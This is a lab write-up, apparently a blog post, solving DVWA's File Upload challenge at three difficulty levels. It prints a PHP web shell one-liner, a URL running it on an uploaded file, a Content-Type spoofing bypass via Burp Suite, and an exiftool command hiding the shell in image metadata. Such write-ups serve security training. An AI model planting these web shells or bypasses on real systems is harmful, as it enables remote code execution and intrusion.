DVWA Vulnerability: File Upload

Ayush Bagde
3 min readMay 14, 2021

--

Hey Guys Fourth Vulnerability which is File Upload.

This is the interface:

LOW:

To trigger the vulnerability of File Upload we’ll have to create a payload. Now there are two ways first is to use automate payload using metasploit and secondly to use manual exploitation and take reverse shell script from online.

So, I am creating a one linear code which is very basic and that is:

<?php

system($_GET[‘cmd’]);

?>

And Now I uploaded it to the website:

Now Let’s attack it

http://144.126.240.162/eujhcwhsftx1mx8gx9t2cl443rs2-182-30138/hackable/uploads/php-reverse-shell.php?cmd=pwd

enter the above command. After this output will be:

MEDIUM

Firstly let’s visit the source code:

It has some sort of security only JPEG or PNG files will be accepted. Let’s bypass this.

For this we’ll use Burpsuite. And we’ll use the same payload we used above.

Now open up the burp and intercept the request of upload. It will look like this:

Just Change the content-Type to image/png and forward the request. Content-Type shows type of file is been uploaded. After changing and forwarding the request we get:

File is successfully uploaded. And that’s how you trigger File upload Vulnerability on Medium Difficulty.

HIGH

Firstly let’s visit the source code:

In this level the previous tricks do not work. The server throws the same error message as the medium level. The problem is here is that extension of the file is always checked. There is no way to upload a file with an extension different from .png or .jpg. What we have to do is exploit a fault in the php server to execute php code hidden in the EXIF data of the image file.

To do so we can either use a file prepared for us in IntruderPayloads images or we can create it ourselves with exiftool.

I’m using exiftool here. You’ll need a real image for this. Same payload we used in low and medium. The command to add some php code in the image is:

exiftool -DocumentName=”<?php system($_GET[‘cmd’]); ?>” filename.jpg

Now Let’s upload it.

It is uploaded. We bypassed the security with HIGH

HAPPY HACKING!!!!

--

--

Ayush Bagde
Ayush Bagde

Written by Ayush Bagde

Associate | MTA Security Fundamentals | Junior Pentester | DLP | Brand Monitoring | Android Pentest | Seclore | Red Teaming

No responses yet